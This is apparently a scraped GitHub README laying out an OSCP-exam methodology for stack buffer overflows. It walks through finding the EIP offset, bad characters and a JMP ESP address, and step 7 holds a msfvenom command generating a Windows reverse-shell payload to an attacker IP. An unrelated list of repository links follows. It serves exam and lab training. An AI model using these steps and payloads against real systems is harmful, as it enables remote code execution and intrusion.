This is a walkthrough about understanding the #BoF machine present in the #OSCP exam.

Overview

Buffer Overflow methodology

GitHub Repo stars GitHub last commit (branch) GitHub

Python 3 GitHub Workflow Status

Twitter Follow

Introduction

These are 7 simple python scripts and a methodology to ease (not automate !) the exploitation. Each script targets a phase of the exploitation :

  1. Trigger the BoF (this is facultative for OSCP since they give you a code snippet)
  2. Find the EIP offset
  3. Confirm the offset
  4. Find the badchars
  5. Confirm badchars + find JMP ESP instruction
  6. Confirm code execution (pop calc)
  7. Exploit host

It's based on the do stack buffer overflow good" project (BTW, it's awesomely explained).

How to use

Follow each step and you'll be able to craft a working example of a BoF exploitation.

All the specific variable are stored in 1 single resource file, to avoid any confusion during the exam.

After each step, fill the proper variables with values found and they'll be re-used for the next step

Note: If after each debug operation performed, the application has become unresponsive; Immunity Debugger should be closed first, then the "vulnapp.exe" application should be restarted, and Attach and Run should be done on Immunity Debugger.

0. Pre-start

Fill in the following variables in the resource file depending on the host to attack :

  • RHOST : the IP address of the host
  • RPORT : the port on which to access the application to exploit

1. Segmentation fault : 1_segfault.py

Send enough length string for victim system crash.

Please note that the total length to input is often given in the exmaple they provide in the exam.

Note the offeset in PARAMETERS.py, in the variable offset_eip.

2. Find the offset : 2_find_offset.py

Generate the pattern (adapt the buffer lenght) :

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <String_Length>

buf += ("<PATTERN>")

Put the output into the variable buf in 2_find_offset.py & send it.

Once the app crashes, note down the value of the EIP register (which is the address of the next operation to be executed).

If needed : convert the EIP value to ASCII : echo "<EIP_value>" | xxd -r -p

Find the offset at which the sequence is met in the pattern :

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_value>

Or, type this in Immunity Debugger : !mona findmsp.

Note the value of the EIP offet in the variable offset_eip in PARAMETERS.py, and the value of the ESP offset in the variable offset_esp.

3. Control the EIP : 3_confirm_offset.py

Execute this script as is.

In Immunity Debugger, make sure that

  • BBBB in the EIP (in hex, so 42424242)
  • CCCCDDDDD..... is written in what ESP points to

4. Find the bad chars : 4_find_badchars.py

Send it to the application

In Immunity Debugger, make mona create a list of badchars :

!mona bytearray –cpb “\x00”

The console output will tell you where it has been saved.

Compare this file with the stack contents :

!mona compare -a ESP -f <file_with_bad_chars>
!mona compare -a <WHATEVER ADDRESS> -f <file_with_bad_chars>

**Note: **always use the full path to the file !

In the mona output, Possibly bad chars are output. Put them in the badchars array in PARAMETERS.py.

5. Confirm badchars & find a JMP ESP instruction : 5_find_jmp_esp.py

a. Confirm badchars

Make sure the badchars identified are mentionned in the PARAMETERS.py file.

Execute the script.

Re-generate a badchar sequence on mona :

!mona bytearray -cpb "\x00\x04\x05\xA2\xA3\xAC\xAD\xC0\xC1\xEF\xF0"

The console output will tell you where it has been saved.

Compare the bytearray.bin (use the full filepath) and the buffer to make sure they are the same. That will mean that no new badchar have been detected :

!mona compare -a ESP -f <file_with_bad_chars>
!mona compare -a <WHATEVER ADDRESS> -f <file_with_bad_chars>

The mona output status should be unmodified and you should get a message in the console saying : !!! Hooray, normal shellcode unmodified !!!

This mean that no other badchars have been detected.

b. Find a JMP ESP

Ask mona to find the instruction JMP ESP that will allow the processor to execute whatever we have put in the stack.

!mona jmp -r esp -cpb "<bad_chars>"       formatted like this : "\x00\x01"

Put the address returned in the variable ptr_jmp_esp in PARAMETERS.py

6. Pop calc : 6_pop_calc.py

This will confirm the code execution on the target host. This can be used to validate the build-up of the exploit, and set a working basis.

Launch this to produce the shellcode that will make calc pop on the target :

msfvenom -p windows/exec -b '<badchars>' -f python --var-name shellcode_calc \
CMD=calc.exe EXITFUNC=thread

Insert the output (python variable shellcode_calc) in the script 6_pop_calc.py.

In the script, we will also move ESP up in the stack (instruction SUB ESP,0x10) This is to avoid the ESP overwrite by the encoder of the payload. Some guys use a NOP sled, here is a more proper way ;)

Launch the script and enjoy popping calc!

7. Create shellcode : 7_exploit.py

Now, you can craft any other shellcode as long as you respect the badchars :

msfvenom -p windows/shell_reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_Port> \
-f py -b '<badchars>' -e x86/shikata_ga_nai -var-name shellcode

Insert the output (python variable shellcode_calc) in the script 7_exploit.py.

You might also like...
Telegram Link Wayback Bot. This bot archives a web page thrown at itself with wayback Machine (Archive.org).

Telegram Link Wayback Bot. This bot archives a web page thrown at itself with wayback Machine (Archive.org).

Buff A simple BOF library I wrote under an hour to help me automate with BOF attack
Buff A simple BOF library I wrote under an hour to help me automate with BOF attack

What is Buff? A simple BOF library I wrote under an hour to help me automate with BOF attack. It comes with fuzzer and a generic method to generate ex

🖍️This is a feature-complete clone of the awesome Chalk (JavaScript) library.
🖍️This is a feature-complete clone of the awesome Chalk (JavaScript) library.

Terminal string styling done right This is a feature-complete clone of the awesome Chalk (JavaScript) library. All credits go to Sindre Sorhus. Highli

High level cheatsheet that was designed to make checks on the OSCP more manageable

High level cheatsheet that was designed to make checks on the OSCP more manageable. This repository however could also be used for your own studying or for evaluating test systems like on HackTheBox or TryHackMe. DM me via Twitter (@FindingUrPasswd) to request any specific additions to the content that you think would also be helpful!

Udacity Suse Cloud Native Foundations Scholarship Course Walkthrough
Udacity Suse Cloud Native Foundations Scholarship Course Walkthrough

SUSE Cloud Native Foundations Scholarship Udacity is collaborating with SUSE, a global leader in true open source solutions, to empower developers and

Stack BOF Protection Bypass Techniques

Stack Buffer Overflow - Protection Bypass Techniques

Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2

Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2

Beacon Object File (BOF) to obtain a usable TGT for the current user.

Beacon Object File (BOF) to obtain a usable TGT for the current user.

The reference baseline of final exam for XMU machine learning course

Mini-NICO Baseline The baseline is a reference method for the final exam of machine learning course. Requirements Installation we use /python3.7 /torc

Codes for realizing theories learned from Data Mining, Machine Learning, Deep Learning without using the present Python packages.

Codes-for-Algorithms Codes for realizing theories learned from Data Mining, Machine Learning, Deep Learning without using the present Python packages.

a bit of my project :) and I use some of them for my school lesson or study for an exam! but some of them just for myself.
a bit of my project :) and I use some of them for my school lesson or study for an exam! but some of them just for myself.

Handy Project a bit of my project :) and I use some of them for my school lesson or study for an exam! but some of them just for myself. the handy pro

AI Based Smart Exam Proctoring Package

AI Based Smart Exam Proctoring Package It takes image (base64) as input: Provide Output as: Detection of Mobile phone. Detection of More than 1 person

Exam assignment for Laboratory of Bioinformatics 2

Exam assignment for Laboratory of Bioinformatics 2 (Alma Mater University of Bologna, Master in Bioinformatics)

A repository for storing njxzc final exam review material

文档地址,请戳我 👈 👈 👈 ☀️ 1.Reason 大三上期末复习软件工程的时候,发现其他高校在GitHub上开源了他们学校的期末试题,我很受触动。期末

G-Research-Crypto-Competition - Project for passing the ML exam. Dataset took from the competition on the kaggle

G-Research-Crypto-Competition Project for passing the ML exam. Dataset took from

examify-io is an online examination system that offers automatic grading , exam statistics , proctoring and programming tests , multiple user roles

examify-io is an online examination system that offers automatic grading , exam statistics , proctoring and programming tests , multiple user roles ( Examiner , Supervisor , Student )

UniPD exam dates finder

UniPD exam dates finder Find dates for exams at UniPD Usage ./finder.py courses.csv It's suggested to save output to a file: ./finder.py courses.csv

My sister is a GR of her class. She had to mark attendance of students from screenshots of teams meeting on an excel sheet. I resolved her problem by reading names from screenshots using PyTesseract and marking them present on the excel using Pandas in Python. It took me 1hr to write the code and it is saving half an hour everyday. An attendance bot that joins google meet automatically according to schedule and marks present in the google meet.
An attendance bot that joins google meet automatically according to schedule and marks present in the google meet.

Google-meet-self-attendance-bot An attendance bot which joins google meet automatically according to schedule and marks present in the google meet. I

Owner
3isenHeiM
Just a pentester knowing some python/bash, trying to make his life smarter ;) Also an Linux/CyberSec/CTF lover
3isenHeiM
Build a better understanding of your data in PostgreSQL.

Data Fluent for PostgreSQL Build a better understanding of your data in PostgreSQL. The following shows an example report generated by this tool. It g

Mark Litwintschik 28 Aug 30, 2022
A fast, distributed, high performance gradient boosting (GBT, GBDT, GBRT, GBM or MART) framework based on decision tree algorithms, used for ranking, classification and many other machine learning tasks.

Light Gradient Boosting Machine LightGBM is a gradient boosting framework that uses tree based learning algorithms. It is designed to be distributed a

Microsoft 14.5k Jan 8, 2023
Official Python client for the MonkeyLearn API. Build and consume machine learning models for language processing from your Python apps.

MonkeyLearn API for Python Official Python client for the MonkeyLearn API. Build and run machine learning models for language processing from your Pyt

MonkeyLearn 157 Nov 22, 2022
🏆 A ranked list of awesome machine learning Python libraries. Updated weekly.

Best-of Machine Learning with Python ?? A ranked list of awesome machine learning Python libraries. Updated weekly. This curated list contains 840 awe

Machine Learning Tooling 12.2k Jan 4, 2023
Free and Open Source Machine Translation API. 100% self-hosted, no limits, no ties to proprietary services. Built on top of Argos Translate.

LibreTranslate Try it online! | API Docs Free and Open Source Machine Translation API, entirely self-hosted. Unlike other APIs, it doesn't rely on pro

UAV4GEO 3.5k Jan 3, 2023
A Tool to scrape URLs for a given domain from wayback machine, Commoncrawl and OTX Alienvault

Mr_URL Mr.URL fetches known URLs for a given domain from Wayback Machine, Commoncrawl and OTX Alienvault. It also finds old versions of any given URL

Stinger 9 Sep 5, 2022
Bringing Ethereum Virtual Machine to StarkNet at warp speed!

Warp Warp brings EVM compatible languages to StarkNet, making it possible to transpile Ethereum smart contracts to Cairo, and use them on StarkNet. Ta

Nethermind 700 Dec 26, 2022
arweave-nft-uploader is a Python tool to improve the experience of uploading NFTs to the Arweave storage for use with the Metaplex Candy Machine.

arweave-nft-uploader arweave-nft-uploader is a Python tool to improve the experience of uploading NFTs to the Arweave storage for use with the Metaple

0xEnrico 84 Dec 26, 2022
This is a tool to help people to make a bot for labelling images for machine learning projects.

labeller_images_python_telegramBOT This is a bot to help collect data for any machine learning project. It was developed using the python-telegram-bot

Diego Silveira 2 Nov 13, 2021
Intelligent Trading Bot: Automatically generating signals and trading based on machine learning and feature engineering

Intelligent Trading Bot: Automatically generating signals and trading based on machine learning and feature engineering

Alexandr Savinov 326 Jan 3, 2023